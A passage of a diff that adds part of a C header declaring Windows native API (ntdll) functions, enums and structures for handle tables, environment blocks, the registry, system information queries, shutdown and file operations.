CommittedHandles; + PRTL_HANDLE_TABLE_ENTRY UnCommittedHandles; + PRTL_HANDLE_TABLE_ENTRY MaxReservedHandles; +} RTL_HANDLE_TABLE, *PRTL_HANDLE_TABLE; + + +NTSYSAPI +VOID +NTAPI +RtlInitializeGenericTable ( + IN PRTL_GENERIC_TABLE Table, + IN PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine, + IN PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine, + IN PRTL_GENERIC_FREE_ROUTINE FreeRoutine, + IN PVOID TableContext + ); + + +NTSYSAPI +VOID +NTAPI +RtlInitializeHandleTable( + IN ULONG MaximumNumberOfHandles, + IN ULONG SizeOfHandleTableEntry, + OUT PRTL_HANDLE_TABLE HandleTable + ); + + +NTSYSAPI +PRTL_HANDLE_TABLE_ENTRY +NTAPI +RtlAllocateHandle( + IN PRTL_HANDLE_TABLE HandleTable, + OUT PULONG HandleIndex OPTIONAL + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlFreeHandle( + IN PRTL_HANDLE_TABLE HandleTable, + IN PRTL_HANDLE_TABLE_ENTRY Handle + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlIsValidIndexHandle( + IN PRTL_HANDLE_TABLE HandleTable, + IN ULONG HandleIndex, + OUT PRTL_HANDLE_TABLE_ENTRY *Handle + ); + + +NTSYSAPI +PVOID +NTAPI +RtlInsertElementGenericTable ( + IN PRTL_GENERIC_TABLE Table, + IN PVOID Buffer, + IN LONG BufferSize, + OUT PBOOLEAN NewElement OPTIONAL + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlIsGenericTableEmpty ( + IN PRTL_GENERIC_TABLE Table + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlIsGenericTableEmpty ( + IN PRTL_GENERIC_TABLE Table + ); + + +NTSYSAPI +PVOID +NTAPI +RtlLookupElementGenericTable ( + IN PRTL_GENERIC_TABLE Table, + IN PVOID Buffer + ); + + +NTSYSAPI +PVOID +NTAPI +RtlEnumerateGenericTableWithoutSplaying( + IN PRTL_GENERIC_TABLE Table, + IN PVOID *RestartKey + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtClose( + IN HANDLE Handle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwClose( + IN HANDLE Handle + ); + +//----------------------------------------------------------------------------- +// Environment functions + +NTSYSAPI +NTSTATUS +NTAPI +RtlOpenCurrentUser( + IN ULONG DesiredAccess, + OUT PHANDLE CurrentUserKey + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlCreateEnvironment( 
+ BOOLEAN CloneCurrentEnvironment, + PVOID *Environment + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlQueryEnvironmentVariable_U ( + PVOID Environment, + PUNICODE_STRING Name, + PUNICODE_STRING Value + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlSetEnvironmentVariable( + PVOID *Environment, + PUNICODE_STRING Name, + PUNICODE_STRING Value + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlDestroyEnvironment( + PVOID Environment + ); + +//----------------------------------------------------------------------------- +// Registry functions + + +typedef enum _KEY_INFORMATION_CLASS +{ + KeyBasicInformation, + KeyNodeInformation, + KeyFullInformation, + KeyNameInformation, + KeyCachedInformation, + KeyFlagsInformation, + MaxKeyInfoClass // MaxKeyInfoClass should always be the last enum + +} KEY_INFORMATION_CLASS; + +// +// Key query structures +// + +typedef struct _KEY_BASIC_INFORMATION +{ + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG NameLength; + WCHAR Name[1]; // Variable length string + +} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION; + + +typedef struct _KEY_NODE_INFORMATION +{ + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG ClassOffset; + ULONG ClassLength; + ULONG NameLength; + WCHAR Name[1]; // Variable length string +// Class[1]; // Variable length string not declared +} KEY_NODE_INFORMATION, *PKEY_NODE_INFORMATION; + + +typedef struct _KEY_FULL_INFORMATION +{ + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG ClassOffset; + ULONG ClassLength; + ULONG SubKeys; + ULONG MaxNameLen; + ULONG MaxClassLen; + ULONG Values; + ULONG MaxValueNameLen; + ULONG MaxValueDataLen; + WCHAR Class[1]; // Variable length + +} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION; + + +// end_wdm +typedef struct _KEY_NAME_INFORMATION +{ + ULONG NameLength; + WCHAR Name[1]; // Variable length string + +} KEY_NAME_INFORMATION, *PKEY_NAME_INFORMATION; + +typedef struct _KEY_CACHED_INFORMATION +{ + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG SubKeys; + ULONG MaxNameLen; + 
ULONG Values; + ULONG MaxValueNameLen; + ULONG MaxValueDataLen; + ULONG NameLength; + WCHAR Name[1]; // Variable length string + +} KEY_CACHED_INFORMATION, *PKEY_CACHED_INFORMATION; + + +typedef struct _KEY_FLAGS_INFORMATION +{ + ULONG UserFlags; + +} KEY_FLAGS_INFORMATION, *PKEY_FLAGS_INFORMATION; + + + +typedef enum _KEY_VALUE_INFORMATION_CLASS { + KeyValueBasicInformation, + KeyValueFullInformation, + KeyValuePartialInformation, + KeyValueFullInformationAlign64, + KeyValuePartialInformationAlign64, + MaxKeyValueInfoClass // MaxKeyValueInfoClass should always be the last enum +} KEY_VALUE_INFORMATION_CLASS; + + +typedef struct _KEY_VALUE_FULL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataOffset; + ULONG DataLength; + ULONG NameLength; + WCHAR Name[1]; // Variable size +// Data[1]; // Variable size data not declared +} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; + + +typedef struct _KEY_VALUE_PARTIAL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataLength; + UCHAR Data[1]; // Variable size +} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; + + + +NTSYSAPI +NTSTATUS +NTAPI +NtCreateKey( + OUT PHANDLE KeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG TitleIndex, + IN PUNICODE_STRING Class OPTIONAL, + IN ULONG CreateOptions, + OUT PULONG Disposition OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenKey( + OUT PHANDLE KeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryKey( + IN HANDLE KeyHandle, + IN KEY_INFORMATION_CLASS KeyInformationClass, + OUT PVOID KeyInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + +NTSYSAPI +NTSTATUS +NTAPI +NtEnumerateKey( + IN HANDLE KeyHandle, + IN ULONG Index, + IN KEY_INFORMATION_CLASS KeyInformationClass, + IN PVOID KeyInformation, + IN ULONG Length, + IN PULONG ResultLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDeleteKey( + IN HANDLE KeyHandle + 
); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, + OUT PVOID KeyValueInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN ULONG TitleIndex OPTIONAL, + IN ULONG Type, + IN PVOID Data, + IN ULONG DataSize + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDeleteValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName + ); + +//----------------------------------------------------------------------------- +// RtlQueryRegistryValues + +// +// The following flags specify how the Name field of a RTL_QUERY_REGISTRY_TABLE +// entry is interpreted. A NULL name indicates the end of the table. +// + +#define RTL_QUERY_REGISTRY_SUBKEY 0x00000001 // Name is a subkey and remainder of + // table or until next subkey are value + // names for that subkey to look at. + +#define RTL_QUERY_REGISTRY_TOPKEY 0x00000002 // Reset current key to original key for + // this and all following table entries. + +#define RTL_QUERY_REGISTRY_REQUIRED 0x00000004 // Fail if no match found for this table + // entry. + +#define RTL_QUERY_REGISTRY_NOVALUE 0x00000008 // Used to mark a table entry that has no + // value name, just wants a call out, not + // an enumeration of all values. + +#define RTL_QUERY_REGISTRY_NOEXPAND 0x00000010 // Used to suppress the expansion of + // REG_MULTI_SZ into multiple callouts or + // to prevent the expansion of environment + // variable values in REG_EXPAND_SZ + +#define RTL_QUERY_REGISTRY_DIRECT 0x00000020 // QueryRoutine field ignored. EntryContext + // field points to location to store value. + // For null terminated strings, EntryContext + // points to UNICODE_STRING structure that + // that describes maximum size of buffer. + // If .Buffer field is NULL then a buffer is + // allocated. 
+ // + +#define RTL_QUERY_REGISTRY_DELETE 0x00000040 // Used to delete value keys after they + // are queried. + + +// +// The following values for the RelativeTo parameter determine what the +// Path parameter to RtlQueryRegistryValues is relative to. +// + +#define RTL_REGISTRY_ABSOLUTE 0 // Path is a full path +#define RTL_REGISTRY_SERVICES 1 // \Registry\Machine\System\CurrentControlSet\Services +#define RTL_REGISTRY_CONTROL 2 // \Registry\Machine\System\CurrentControlSet\Control +#define RTL_REGISTRY_WINDOWS_NT 3 // \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion +#define RTL_REGISTRY_DEVICEMAP 4 // \Registry\Machine\Hardware\DeviceMap +#define RTL_REGISTRY_USER 5 // \Registry\User\CurrentUser +#define RTL_REGISTRY_MAXIMUM 6 +#define RTL_REGISTRY_HANDLE 0x40000000 // Low order bits are registry handle +#define RTL_REGISTRY_OPTIONAL 0x80000000 // Indicates the key node is optional + + +typedef NTSTATUS (NTAPI * PRTL_QUERY_REGISTRY_ROUTINE)( + IN PWSTR ValueName, + IN ULONG ValueType, + IN PVOID ValueData, + IN ULONG ValueLength, + IN PVOID Context, + IN PVOID EntryContext + ); + +typedef struct _RTL_QUERY_REGISTRY_TABLE +{ + PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine; + ULONG Flags; + PWSTR Name; + PVOID EntryContext; + ULONG DefaultType; + PVOID DefaultData; + ULONG DefaultLength; + +} RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE; + + +NTSYSAPI +NTSTATUS +NTAPI +RtlQueryRegistryValues( + IN ULONG RelativeTo, + IN PCWSTR Path, + IN PRTL_QUERY_REGISTRY_TABLE QueryTable, + IN PVOID Context, + IN PVOID Environment OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Query system information + +typedef enum _SYSTEM_INFORMATION_CLASS +{ + SystemBasicInformation, // 0x00 SYSTEM_BASIC_INFORMATION + SystemProcessorInformation, // 0x01 SYSTEM_PROCESSOR_INFORMATION + SystemPerformanceInformation, // 0x02 + SystemTimeOfDayInformation, // 0x03 + SystemPathInformation, // 0x04 + SystemProcessInformation, 
// 0x05 + SystemCallCountInformation, // 0x06 + SystemDeviceInformation, // 0x07 + SystemProcessorPerformanceInformation, // 0x08 + SystemFlagsInformation, // 0x09 + SystemCallTimeInformation, // 0x0A + SystemModuleInformation, // 0x0B SYSTEM_MODULE_INFORMATION + SystemLocksInformation, // 0x0C + SystemStackTraceInformation, // 0x0D + SystemPagedPoolInformation, // 0x0E + SystemNonPagedPoolInformation, // 0x0F + SystemHandleInformation, // 0x10 + SystemObjectInformation, // 0x11 + SystemPageFileInformation, // 0x12 + SystemVdmInstemulInformation, // 0x13 + SystemVdmBopInformation, // 0x14 + SystemFileCacheInformation, // 0x15 + SystemPoolTagInformation, // 0x16 + SystemInterruptInformation, // 0x17 + SystemDpcBehaviorInformation, // 0x18 + SystemFullMemoryInformation, // 0x19 + SystemLoadGdiDriverInformation, // 0x1A + SystemUnloadGdiDriverInformation, // 0x1B + SystemTimeAdjustmentInformation, // 0x1C + SystemSummaryMemoryInformation, // 0x1D + SystemNextEventIdInformation, // 0x1E + SystemEventIdsInformation, // 0x1F + SystemCrashDumpInformation, // 0x20 + SystemExceptionInformation, // 0x21 + SystemCrashDumpStateInformation, // 0x22 + SystemKernelDebuggerInformation, // 0x23 + SystemContextSwitchInformation, // 0x24 + SystemRegistryQuotaInformation, // 0x25 + SystemExtendServiceTableInformation, // 0x26 + SystemPrioritySeperation, // 0x27 + SystemPlugPlayBusInformation, // 0x28 + SystemDockInformation, // 0x29 + //SystemPowerInformation, // 0x2A + //SystemProcessorSpeedInformation, // 0x2B + //SystemCurrentTimeZoneInformation, // 0x2C + //SystemLookasideInformation // 0x2D + +} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; + +// +// Thread priority +// + +typedef LONG KPRIORITY; + +// +// Basic System information +// NtQuerySystemInformation with SystemBasicInformation +// + +typedef struct _SYSTEM_BASIC_INFORMATION { + ULONG Reserved; + ULONG TimerResolution; + ULONG PageSize; + ULONG NumberOfPhysicalPages; + ULONG LowestPhysicalPageNumber; + ULONG 
HighestPhysicalPageNumber; + ULONG AllocationGranularity; + ULONG MinimumUserModeAddress; + ULONG MaximumUserModeAddress; + KAFFINITY ActiveProcessorsAffinityMask; + CCHAR NumberOfProcessors; +} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION; + +// +// Processor information +// NtQuerySystemInformation with SystemProcessorInformation +// + +typedef struct _SYSTEM_PROCESSOR_INFORMATION { + USHORT ProcessorArchitecture; + USHORT ProcessorLevel; + USHORT ProcessorRevision; + USHORT Reserved; + ULONG ProcessorFeatureBits; +} SYSTEM_PROCESSOR_INFORMATION, *PSYSTEM_PROCESSOR_INFORMATION; + +// +// Performance information +// NtQuerySystemInformation with SystemPerformanceInformation +// + +typedef struct _SYSTEM_PERFORMANCE_INFORMATION { + LARGE_INTEGER IdleProcessTime; + LARGE_INTEGER IoReadTransferCount; + LARGE_INTEGER IoWriteTransferCount; + LARGE_INTEGER IoOtherTransferCount; + ULONG IoReadOperationCount; + ULONG IoWriteOperationCount; + ULONG IoOtherOperationCount; + ULONG AvailablePages; + ULONG CommittedPages; + ULONG CommitLimit; + ULONG PeakCommitment; + ULONG PageFaultCount; + ULONG CopyOnWriteCount; + ULONG TransitionCount; + ULONG CacheTransitionCount; + ULONG DemandZeroCount; + ULONG PageReadCount; + ULONG PageReadIoCount; + ULONG CacheReadCount; + ULONG CacheIoCount; + ULONG DirtyPagesWriteCount; + ULONG DirtyWriteIoCount; + ULONG MappedPagesWriteCount; + ULONG MappedWriteIoCount; + ULONG PagedPoolPages; + ULONG NonPagedPoolPages; + ULONG PagedPoolAllocs; + ULONG PagedPoolFrees; + ULONG NonPagedPoolAllocs; + ULONG NonPagedPoolFrees; + ULONG FreeSystemPtes; + ULONG ResidentSystemCodePage; + ULONG TotalSystemDriverPages; + ULONG TotalSystemCodePages; + ULONG NonPagedPoolLookasideHits; + ULONG PagedPoolLookasideHits; + ULONG Spare3Count; + ULONG ResidentSystemCachePage; + ULONG ResidentPagedPoolPage; + ULONG ResidentSystemDriverPage; + ULONG CcFastReadNoWait; + ULONG CcFastReadWait; + ULONG CcFastReadResourceMiss; + ULONG CcFastReadNotPossible; + ULONG 
CcFastMdlReadNoWait; + ULONG CcFastMdlReadWait; + ULONG CcFastMdlReadResourceMiss; + ULONG CcFastMdlReadNotPossible; + ULONG CcMapDataNoWait; + ULONG CcMapDataWait; + ULONG CcMapDataNoWaitMiss; + ULONG CcMapDataWaitMiss; + ULONG CcPinMappedDataCount; + ULONG CcPinReadNoWait; + ULONG CcPinReadWait; + ULONG CcPinReadNoWaitMiss; + ULONG CcPinReadWaitMiss; + ULONG CcCopyReadNoWait; + ULONG CcCopyReadWait; + ULONG CcCopyReadNoWaitMiss; + ULONG CcCopyReadWaitMiss; + ULONG CcMdlReadNoWait; + ULONG CcMdlReadWait; + ULONG CcMdlReadNoWaitMiss; + ULONG CcMdlReadWaitMiss; + ULONG CcReadAheadIos; + ULONG CcLazyWriteIos; + ULONG CcLazyWritePages; + ULONG CcDataFlushes; + ULONG CcDataPages; + ULONG ContextSwitches; + ULONG FirstLevelTbFills; + ULONG SecondLevelTbFills; + ULONG SystemCalls; +} SYSTEM_PERFORMANCE_INFORMATION, *PSYSTEM_PERFORMANCE_INFORMATION; + +// +// Time of Day information +// NtQuerySystemInformation with SystemTimeOfDayInformation +// + +typedef struct _SYSTEM_TIMEOFDAY_INFORMATION { + LARGE_INTEGER BootTime; + LARGE_INTEGER CurrentTime; + LARGE_INTEGER TimeZoneBias; + ULONG TimeZoneId; + ULONG Reserved; +} SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION; + +// +// Process information +// NtQuerySystemInformation with SystemProcessInformation +// + +typedef struct _SYSTEM_PROCESS_INFORMATION { + ULONG NextEntryOffset; + ULONG NumberOfThreads; + LARGE_INTEGER SpareLi1; + LARGE_INTEGER SpareLi2; + LARGE_INTEGER SpareLi3; + LARGE_INTEGER CreateTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER KernelTime; + UNICODE_STRING ImageName; + KPRIORITY BasePriority; + ULONG_PTR UniqueProcessId; + ULONG_PTR InheritedFromUniqueProcessId; + ULONG HandleCount; + // Next part is platform dependent + +} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; + +// +// Device information +// NtQuerySystemInformation with SystemDeviceInformation +// + +typedef struct _SYSTEM_DEVICE_INFORMATION { + ULONG NumberOfDisks; + ULONG NumberOfFloppies; + ULONG NumberOfCdRoms; 
+ ULONG NumberOfTapes; + ULONG NumberOfSerialPorts; + ULONG NumberOfParallelPorts; +} SYSTEM_DEVICE_INFORMATION, *PSYSTEM_DEVICE_INFORMATION; + +// +// Processor performance information +// NtQuerySystemInformation with SystemProcessorPerformanceInformation +// + +typedef struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION { + LARGE_INTEGER IdleTime; + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER DpcTime; // DEVL only + LARGE_INTEGER InterruptTime; // DEVL only + ULONG InterruptCount; +} SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION, *PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION; + +// +// NT Global Flag information +// NtQuerySystemInformation with SystemFlagsInformation +// + +typedef struct _SYSTEM_FLAGS_INFORMATION +{ + ULONG GlobalFlag; + +} SYSTEM_FLAGS_INFORMATION, *PSYSTEM_FLAGS_INFORMATION; + +// +// System Module information +// NtQuerySystemInformation with SystemModuleInformation +// + +typedef struct _SYSTEM_MODULE +{ + ULONG Reserved1; // Should be 0xBAADF00D + ULONG Reserved2; // Should be zero + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT Unknown; + USHORT LoadCount; + USHORT ModuleNameOffset; + CHAR ImageName[256]; + +} SYSTEM_MODULE, *PSYSTEM_MODULE; + + +typedef struct _SYSTEM_MODULE_INFORMATION +{ + ULONG ModulesCount; + SYSTEM_MODULE Modules[1]; + +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + +/* +typedef struct _SYSTEM_VDM_INSTEMUL_INFO { + ULONG SegmentNotPresent ; + ULONG VdmOpcode0F ; + ULONG OpcodeESPrefix ; + ULONG OpcodeCSPrefix ; + ULONG OpcodeSSPrefix ; + ULONG OpcodeDSPrefix ; + ULONG OpcodeFSPrefix ; + ULONG OpcodeGSPrefix ; + ULONG OpcodeOPER32Prefix; + ULONG OpcodeADDR32Prefix; + ULONG OpcodeINSB ; + ULONG OpcodeINSW ; + ULONG OpcodeOUTSB ; + ULONG OpcodeOUTSW ; + ULONG OpcodePUSHF ; + ULONG OpcodePOPF ; + ULONG OpcodeINTnn ; + ULONG OpcodeINTO ; + ULONG OpcodeIRET ; + ULONG OpcodeINBimm ; + ULONG OpcodeINWimm ; + ULONG OpcodeOUTBimm ; + ULONG OpcodeOUTWimm ; + ULONG OpcodeINB ; + 
ULONG OpcodeINW ; + ULONG OpcodeOUTB ; + ULONG OpcodeOUTW ; + ULONG OpcodeLOCKPrefix ; + ULONG OpcodeREPNEPrefix ; + ULONG OpcodeREPPrefix ; + ULONG OpcodeHLT ; + ULONG OpcodeCLI ; + ULONG OpcodeSTI ; + ULONG BopCount ; +} SYSTEM_VDM_INSTEMUL_INFO, *PSYSTEM_VDM_INSTEMUL_INFO; + + +typedef struct _SYSTEM_QUERY_TIME_ADJUST_INFORMATION { + ULONG TimeAdjustment; + ULONG TimeIncrement; + BOOLEAN Enable; +} SYSTEM_QUERY_TIME_ADJUST_INFORMATION, *PSYSTEM_QUERY_TIME_ADJUST_INFORMATION; + +typedef struct _SYSTEM_SET_TIME_ADJUST_INFORMATION { + ULONG TimeAdjustment; + BOOLEAN Enable; +} SYSTEM_SET_TIME_ADJUST_INFORMATION, *PSYSTEM_SET_TIME_ADJUST_INFORMATION; + + +typedef struct _SYSTEM_THREAD_INFORMATION { + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER CreateTime; + ULONG WaitTime; + PVOID StartAddress; + CLIENT_ID ClientId; + KPRIORITY Priority; + LONG BasePriority; + ULONG ContextSwitches; + ULONG ThreadState; + ULONG WaitReason; +} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; + +typedef struct _SYSTEM_MEMORY_INFO { + PUCHAR StringOffset; + USHORT ValidCount; + USHORT TransitionCount; + USHORT ModifiedCount; + USHORT PageTableCount; +} SYSTEM_MEMORY_INFO, *PSYSTEM_MEMORY_INFO; + +typedef struct _SYSTEM_MEMORY_INFORMATION { + ULONG InfoSize; + ULONG StringStart; + SYSTEM_MEMORY_INFO Memory[1]; +} SYSTEM_MEMORY_INFORMATION, *PSYSTEM_MEMORY_INFORMATION; + +typedef struct _SYSTEM_CALL_COUNT_INFORMATION { + ULONG Length; + ULONG NumberOfTables; + //ULONG NumberOfEntries[NumberOfTables]; + //ULONG CallCounts[NumberOfTables][NumberOfEntries]; +} SYSTEM_CALL_COUNT_INFORMATION, *PSYSTEM_CALL_COUNT_INFORMATION; + +typedef struct _SYSTEM_CRASH_DUMP_INFORMATION { + HANDLE CrashDumpSection; +} SYSTEM_CRASH_DUMP_INFORMATION, *PSYSTEM_CRASH_DUMP_INFORMATION; + +typedef struct _SYSTEM_EXCEPTION_INFORMATION { + ULONG AlignmentFixupCount; + ULONG ExceptionDispatchCount; + ULONG FloatingEmulationCount; + ULONG ByteWordEmulationCount; +} 
SYSTEM_EXCEPTION_INFORMATION, *PSYSTEM_EXCEPTION_INFORMATION; + +typedef struct _SYSTEM_CRASH_STATE_INFORMATION { + ULONG ValidCrashDump; +} SYSTEM_CRASH_STATE_INFORMATION, *PSYSTEM_CRASH_STATE_INFORMATION; + +typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { + BOOLEAN KernelDebuggerEnabled; + BOOLEAN KernelDebuggerNotPresent; +} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; + +typedef struct _SYSTEM_REGISTRY_QUOTA_INFORMATION { + ULONG RegistryQuotaAllowed; + ULONG RegistryQuotaUsed; + ULONG PagedPoolSize; +} SYSTEM_REGISTRY_QUOTA_INFORMATION, *PSYSTEM_REGISTRY_QUOTA_INFORMATION; + +typedef struct _SYSTEM_GDI_DRIVER_INFORMATION { + UNICODE_STRING DriverName; + PVOID ImageAddress; + PVOID SectionPointer; + PVOID EntryPoint; + PIMAGE_EXPORT_DIRECTORY ExportSectionPointer; +} SYSTEM_GDI_DRIVER_INFORMATION, *PSYSTEM_GDI_DRIVER_INFORMATION; +*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtQuerySystemInformation( + IN SYSTEM_INFORMATION_CLASS SystemInformationClass, + OUT PVOID SystemInformation, + IN ULONG SystemInformationLength, + OUT PULONG ReturnLength + ); + +//------------------------------------------------------------------------------ +// Shutdown system + +typedef enum _SHUTDOWN_ACTION +{ + ShutdownNoReboot, + ShutdownReboot, + ShutdownPowerOff + +} SHUTDOWN_ACTION, *PSHUTDOWN_ACTION; + + +NTSYSAPI +NTSTATUS +NTAPI +NtShutdownSystem( + IN SHUTDOWN_ACTION Action + ); + +//----------------------------------------------------------------------------- +// File functions + +#ifndef OLD_DOS_VOLID +#define OLD_DOS_VOLID 0x00000008 +#endif + +#ifndef FILE_SUPERSEDE +#define FILE_SUPERSEDE 0x00000000 +#define FILE_OPEN 0x00000001 +#define FILE_CREATE 0x00000002 +#define FILE_OPEN_IF 0x00000003 +#define FILE_OVERWRITE 0x00000004 +#define FILE_OVERWRITE_IF 0x00000005 +#define FILE_MAXIMUM_DISPOSITION 0x00000005 +#endif // File create flags + + +// Define the create/open option flags +#ifndef FILE_DIRECTORY_FILE +#define FILE_DIRECTORY_FILE 0x00000001 
+#define FILE_WRITE_THROUGH 0x00000002 +#define FILE_SEQUENTIAL_ONLY 0x00000004 +#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008 +#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010 +#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 +#define FILE_NON_DIRECTORY_FILE 0x00000040 +#define FILE_CREATE_TREE_CONNECTION 0x00000080 +#define FILE_COMPLETE_IF_OPLOCKED 0x00000100 +#define FILE_NO_EA_KNOWLEDGE 0x00000200 +#define FILE_OPEN_FOR_RECOVERY 0x00000400 +#define FILE_RANDOM_ACCESS 0x00000800 +#define FILE_DELETE_ON_CLOSE 0x00001000 +#define FILE_OPEN_BY_FILE_ID 0x00002000 +#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 +#define FILE_NO_COMPRESSION 0x00008000 +#define FILE_RESERVE_OPFILTER 0x00100000 +#define FILE_OPEN_REPARSE_POINT 0x00200000 +#define FILE_OPEN_NO_RECALL 0x00400000 +#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 +#endif // FILE_DIRECTORY_FILE + + +// +// Define the I/O status information return values for NtCreateFile/NtOpenFile +// + +#ifndef FILE_SUPERSEDED +#define FILE_SUPERSEDED 0x00000000 +#define FILE_OPENED 0x00000001 +#define FILE_CREATED 0x00000002 +#define FILE_OVERWRITTEN 0x00000003 +#define FILE_EXISTS 0x00000004 +#define FILE_DOES_NOT_EXIST 0x00000005 +#endif + + +#ifndef PIO_APC_ROUTINE_DEFINED +typedef +VOID +(NTAPI *PIO_APC_ROUTINE) ( + IN PVOID ApcContext, + IN PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG Reserved + ); +#define PIO_APC_ROUTINE_DEFINED +#endif // PIO_APC_ROUTINE_DEFINED + + +typedef enum _FILE_INFORMATION_CLASS +{ + FileDirectoryInformation = 1, + FileFullDirectoryInformation, // 2 + FileBothDirectoryInformation, // 3 + FileBasicInformation, // 4 wdm + FileStandardInformation, // 5 wdm + FileInternalInformation, // 6 + FileEaInformation, // 7 + FileAccessInformation, // 8 + FileNameInformation, // 9 + FileRenameInformation, // 10 + FileLinkInformation, // 11 + FileNamesInformation, // 12 + FileDispositionInformation, // 13 + FilePositionInformation, // 14 wdm + FileFullEaInformation, // 15 + FileModeInformation, // 16 + 
FileAlignmentInformation, // 17 + FileAllInformation, // 18 + FileAllocationInformation, // 19 + FileEndOfFileInformation, // 20 wdm + FileAlternateNameInformation, // 21 + FileStreamInformation, // 22 + FilePipeInformation, // 23 + FilePipeLocalInformation, // 24 + FilePipeRemoteInformation, // 25 + FileMailslotQueryInformation, // 26 + FileMailslotSetInformation, // 27 + FileCompressionInformation, // 28 + FileObjectIdInformation, // 29 + FileCompletionInformation, // 30 + FileMoveClusterInformation, // 31 + FileQuotaInformation, // 32 + FileReparsePointInformation, // 33 + FileNetworkOpenInformation, // 34 + FileAttributeTagInformation, // 35 + FileTrackingInformation, // 36 + FileIdBothDirectoryInformation, // 37 + FileIdFullDirectoryInformation, // 38 + FileValidDataLengthInformation, // 39 + FileShortNameInformation, // 40 + FileIoCompletionNotificationInformation, // 41 + FileIoStatusBlockRangeInformation, // 42 + FileIoPriorityHintInformation, // 43 + FileSfioReserveInformation, // 44 + FileSfioVolumeInformation, // 45 + FileHardLinkInformation, // 46 + FileProcessIdsUsingFileInformation, // 47 + FileMaximumInformation // 48 +} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; + + +typedef struct _FILE_DIRECTORY_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; + + +typedef struct _FILE_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + WCHAR FileName[1]; +} FILE_FULL_DIR_INFORMATION, 
